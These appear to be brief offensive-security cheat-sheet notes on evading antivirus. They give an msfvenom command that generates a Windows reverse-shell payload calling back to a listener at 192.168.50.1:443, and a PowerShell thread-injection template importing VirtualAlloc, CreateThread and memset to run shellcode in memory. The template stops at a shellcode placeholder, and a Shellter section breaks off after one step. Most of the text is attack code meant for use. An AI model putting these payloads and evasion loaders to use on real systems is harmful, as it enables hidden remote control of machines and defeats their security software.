Antivirus Evasion Techniques
Evading AV with Thread Injection
Step 1. Generate the payload with msfvenom (32-bit, PowerShell reflective-loader format)

```shell
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.50.1 LPORT=443 -f psh-reflection
```
Step 2. Put the payload into this memory-injection template

```powershell
$code = '
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);';
```

<place shellcode here>
Using Shellter
Step 1. Download any 32-bit .exe application.
📚 References
- DarkOperator - Good reference for PowerShell scripts